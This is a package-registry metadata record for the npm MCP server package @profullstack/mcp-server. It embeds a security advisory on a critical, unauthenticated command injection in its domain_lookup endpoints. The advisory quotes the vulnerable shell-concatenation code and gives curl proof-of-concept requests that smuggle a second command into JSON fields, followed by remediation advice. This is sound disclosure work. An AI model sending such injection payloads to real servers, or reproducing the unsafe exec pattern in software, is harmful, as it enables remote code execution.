{"id":11678198,"name":"@profullstack/mcp-server","ecosystem":"npm","description":"A generic, modular server for implementing the Model Context Protocol (MCP)","homepage":"https://profullstack.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/profullstack/mcp-server","keywords_array":["mcp","model","ai","server","api"],"namespace":"profullstack","versions_count":18,"first_release_published_at":"2025-05-23T16:28:10.461Z","latest_release_published_at":"2025-06-16T02:47:12.256Z","latest_release_number":"1.4.12","last_synced_at":"2026-05-18T10:53:29.900Z","created_at":"2025-05-23T16:29:03.049Z","updated_at":"2026-05-18T13:39:24.780Z","registry_url":"https://www.npmjs.com/package/@profullstack/mcp-server","install_command":"npm install @profullstack/mcp-server","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.4.12"}},"repo_metadata":{"id":292866453,"uuid":"982197253","full_name":"profullstack/mcp-server","owner":"profullstack","description":"A generic, modular server for implementing the Model Context Protocol (MCP). ","archived":false,"fork":false,"pushed_at":"2025-08-14T15:41:00.000Z","size":1185,"stargazers_count":40,"open_issues_count":1,"forks_count":3,"subscribers_count":2,"default_branch":"master","last_synced_at":"2026-02-24T00:21:04.538Z","etag":null,"topics":["mcp-server"],"latest_commit_sha":null,"homepage":"https://mcp.profullstack.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"isc","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/profullstack.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-05-12T14:13:21.000Z","updated_at":"2026-02-16T16:41:39.000Z","dependencies_parsed_at":"2025-05-12T15:49:40.899Z","dependency_job_id":"8ec546a6-aa52-4959-b79c-fcfc9125b2ae","html_url":"https://github.com/profullstack/mcp-server","commit_stats":null,"previous_names":["profullstack/mcp-server"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/profullstack/mcp-server","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/profullstack","download_url":"https://codeload.github.com/profullstack/mcp-server/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32803655,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-08T08:22:46.396Z","status":"ssl_error","status_checked_at":"2026-05-08T08:22:45.650Z","response_time":54,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"profullstack","name":"profullstack","uuid":"44715329","kind":"organization","description":"Professional fullstack development","email":"anthony@profullstack.com","website":"http://profullstack.com","location":"Aptos, CA","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/44715329?v=4","repositories_count":37,"last_synced_at":"2024-04-14T06:41:17.350Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/profullstack","funding_links":[],"total_stars":48,"followers":5,"following":0,"created_at":"2023-03-06T14:27:49.038Z","updated_at":"2024-04-14T06:41:23.439Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/profullstack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/profullstack/repositories"},"tags":[]},"repo_metadata_updated_at":"2026-05-18T13:39:24.758Z","dependent_packages_count":0,"downloads":362,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":24.586083468546434,"dependent_packages_count":35.486515488693335,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.036299478619885},"purl":"pkg:npm/%40profullstack/mcp-server","advisories":[{"uuid":"GSA_kwCzR0hTQS12NndqLWM4M2YtdjQ2eM4ABWg8","url":"https://github.com/advisories/GHSA-v6wj-c83f-v46x","title":"@profullstack/mcp-server vulnerable to OS Command Injection in domain_lookup Module","description":"\u003chtml\u003e\n\u003cbody\u003e\n\u003c!--StartFragment--\u003e\u003chtml\u003e\u003chead\u003e\u003c/head\u003e\u003cbody\u003e\u003ch1\u003eSecurity Advisory: OS Command Injection in \u003ccode\u003eprofullstack/mcp-server\u003c/code\u003e \u003ccode\u003edomain_lookup\u003c/code\u003e Module\u003c/h1\u003e\n\nField | Value\n-- | --\nProject | profullstack/mcp-server\nRepository | https://github.com/profullstack/mcp-server\nAffected Commit | 2e8ea913573610667ad54e31dba2e8198ebf7cf9\nAffected Module | mcp_modules/domain_lookup\nAffected Endpoints | POST /domain-lookup/check, POST /domain-lookup/bulk\nVulnerability Type | CWE-78: OS Command Injection\nCVSS 3.1 Score | 9.8 (Critical) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nAuthentication Required | None\nDefault Network Exposure | Bind address 0.0.0.0, no global authentication middleware\nValidated | 2026-04-21 (initial), 2026-04-28 (re-confirmed)\n\n\n\u003chr\u003e\n\u003ch2\u003eSummary\u003c/h2\u003e\n\u003cp\u003eThe \u003ccode\u003edomain_lookup\u003c/code\u003e module assembles a shell command string by concatenating user-controlled input (\u003ccode\u003edomains\u003c/code\u003e / \u003ccode\u003ekeywords\u003c/code\u003e) and passes it to \u003ccode\u003eexecAsync()\u003c/code\u003e. Both HTTP endpoints reach the same sink. Because there is no argument quoting, escaping, or allowlist — and no authentication on the server — an unauthenticated remote attacker can execute arbitrary OS commands as the server process.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2\u003eAffected Code\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eindex.js:27\u003c/code\u003e — server binds to \u003ccode\u003e0.0.0.0\u003c/code\u003e, no global auth middleware.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emcp_modules/domain_lookup/index.js:52\u003c/code\u003e — registers \u003ccode\u003ePOST /domain-lookup/check\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emcp_modules/domain_lookup/index.js:55\u003c/code\u003e — registers \u003ccode\u003ePOST /domain-lookup/bulk\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emcp_modules/domain_lookup/src/service.js:19, :20\u003c/code\u003e — \u003ccode\u003ebuildTldxCommand()\u003c/code\u003e concatenates user input into the shell string.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emcp_modules/domain_lookup/src/service.js:114, :115, :142\u003c/code\u003e — \u003ccode\u003eexecAsync(command)\u003c/code\u003e sink reached from both routes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2\u003eVulnerable Code\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFile:\u003c/strong\u003e \u003ccode\u003emcp_modules/domain_lookup/src/service.js\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eStep 1 — User input concatenated directly into a shell string:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-js\"\u003ebuildTldxCommand(keywords, options = {}) {\n  let command = `tldx ${keywords.join(' ')}`;\n\n  if (options.prefixes?.length) {\n    command += ` --prefixes ${options.prefixes.join(',')}`;\n  }\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eStep 2 — That shell string is executed as-is:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-js\"\u003easync checkDomainAvailability(domains, options = {}) {\n  try {\n    const command = this.buildTldxCommand(domains, options);\n    const { stdout, stderr } = await execAsync(command);\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThere is no sanitization between Step 1 and Step 2. Shell metacharacters (\u003ccode\u003e;\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, \u003ccode\u003e$()\u003c/code\u003e, etc.) in user input are interpreted by \u003ccode\u003e/bin/sh\u003c/code\u003e at execution time.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2\u003eProof of Concept\u003c/h2\u003e\n\u003cp\u003eTested against a local Docker build of the affected commit (\u003ccode\u003e0.0.0.0:13000-\u0026gt;3000/tcp\u003c/code\u003e).\u003c/p\u003e\n\u003ch3\u003ePoC A — \u003ccode\u003ePOST /domain-lookup/check\u003c/code\u003e\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eRequest:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -X POST http://localhost:13000/domain-lookup/check \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"domains\":[\"example.com; echo final_check_poc \u0026gt; /tmp/verify-exports/final_check.txt; #\"]}'\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eResponse:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eHTTP/1.1 500 Internal Server Error\naccess-control-allow-origin: *\ncontent-type: application/json\nDate: Tue, 21 Apr 2026 04:32:39 GMT\n\n{\"error\":\"tldx command failed: tldx command failed: /bin/sh: tldx: not found\\n\"}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eSide effect confirmed inside container:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e$ cat /tmp/verify-exports/final_check.txt\nfinal_check_poc\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3\u003ePoC B — \u003ccode\u003ePOST /domain-lookup/bulk\u003c/code\u003e\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eRequest:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -X POST http://localhost:13000/domain-lookup/bulk \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"keywords\":[\"safe\",\"x; echo final_bulk_poc \u0026gt; /tmp/verify-exports/final_bulk.txt; #\"]}'\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eResponse:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eHTTP/1.1 500 Internal Server Error\naccess-control-allow-origin: *\ncontent-type: application/json\nDate: Tue, 21 Apr 2026 04:32:40 GMT\n\n{\"error\":\"Bulk domain check failed: Bulk domain check failed: /bin/sh: tldx: not found\\n\"}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cstrong\u003eSide effect confirmed inside container:\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e$ cat /tmp/verify-exports/final_bulk.txt\nfinal_bulk_poc\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3\u003eNote on HTTP 500\u003c/h3\u003e\n\u003cp\u003eBoth requests return HTTP 500 because \u003ccode\u003etldx\u003c/code\u003e is not installed in the test container. The injected commands are interpreted by the shell \u003cstrong\u003ebefore\u003c/strong\u003e \u003ccode\u003etldx\u003c/code\u003e is invoked. The marker files confirm that attacker-controlled commands executed successfully despite the 500 response. In a production environment where \u003ccode\u003etldx\u003c/code\u003e is installed, both the intended function and the injected commands execute.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2\u003eImpact\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUnauthenticated remote code execution as the server process UID.\u003c/li\u003e\n\u003cli\u003eFull read/write access to any file the server process can access.\u003c/li\u003e\n\u003cli\u003ePotential for outbound connections, credential theft, persistence, and lateral movement.\u003c/li\u003e\n\u003cli\u003eReproducible with a single unauthenticated HTTP POST to either of two documented endpoints.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2\u003eSuggested Remediation\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eReplace \u003ccode\u003eexecAsync(command)\u003c/code\u003e with \u003ccode\u003echild_process.execFile\u003c/code\u003e or \u003ccode\u003espawn('tldx', [keyword1, keyword2, ...])\u003c/code\u003e — pass arguments as an array, never as a concatenated shell string.\u003c/li\u003e\n\u003cli\u003eValidate all domain/keyword input against a strict allowlist (RFC 1035 hostname syntax) before invoking the external binary; reject any input containing shell metacharacters.\u003c/li\u003e\n\u003cli\u003eAdd a global authentication middleware so all HTTP-exposed modules are not callable anonymously.\u003c/li\u003e\n\u003cli\u003eDefault the server bind address to \u003ccode\u003e127.0.0.1\u003c/code\u003e and require explicit opt-in for non-loopback bindings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch2\u003eVerification Environment\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eLocal Docker container only; no third-party deployment was tested.\u003c/li\u003e\n\u003cli\u003eThe container does not include the \u003ccode\u003etldx\u003c/code\u003e binary; this is intentional for safe local PoC and does not affect exploitability.\u003c/li\u003e\n\u003c/ul\u003e\u003c/body\u003e\u003c/html\u003e\u003c!--EndFragment--\u003e\n\u003c/body\u003e\n\u003c/html\u003e","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-05-09T00:42:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/profullstack/mcp-server/security/advisories/GHSA-v6wj-c83f-v46x","https://github.com/advisories/GHSA-v6wj-c83f-v46x"],"source_kind":"github","identifiers":["GHSA-v6wj-c83f-v46x"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-09T01:00:09.216Z","updated_at":"2026-05-09T06:00:08.212Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12NndqLWM4M2YtdjQ2eM4ABWg8","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12NndqLWM4M2YtdjQ2eM4ABWg8","packages":[{"ecosystem":"npm","package_name":"@profullstack/mcp-server","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.4.12"}],"purl":"pkg:npm/%40profullstack%2Fmcp-server"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12NndqLWM4M2YtdjQ2eM4ABWg8/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@profullstack/mcp-server","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@profullstack/mcp-server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@profullstack/mcp-server/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-30T00:04:40.016Z","issues_count":3,"pull_requests_count":0,"avg_time_to_close_issue":193100.0,"avg_time_to_close_pull_request":null,"issues_closed_count":2,"pull_requests_closed_count":0,"pull_request_authors_count":0,"issue_authors_count":2,"avg_comments_per_issue":2.0,"avg_comments_per_pull_request":null,"merged_pull_requests_count":0,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":3,"past_year_pull_requests_count":0,"past_year_avg_time_to_close_issue":193100.0,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":2,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":0,"past_year_issue_authors_count":2,"past_year_avg_comments_per_issue":2.0,"past_year_avg_comments_per_pull_request":null,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/profullstack%2Fmcp-server/issues","maintainers":[],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@profullstack%2Fmcp-server/codemeta","maintainers":[{"uuid":"chovy","login":"chovy","name":null,"email":"anthony@chovy.com","url":null,"packages_count":265,"html_url":"https://www.npmjs.com/~chovy","role":null,"created_at":"2025-05-23T16:37:58.036Z","updated_at":"2025-05-23T16:37:58.036Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/chovy/packages"},{"uuid":"devpreshy","login":"devpreshy","name":null,"email":"devpreshy@gmail.com","url":null,"packages_count":243,"html_url":"https://www.npmjs.com/~devpreshy","role":null,"created_at":"2025-05-23T16:37:58.096Z","updated_at":"2025-05-23T16:37:58.096Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/devpreshy/packages"}]}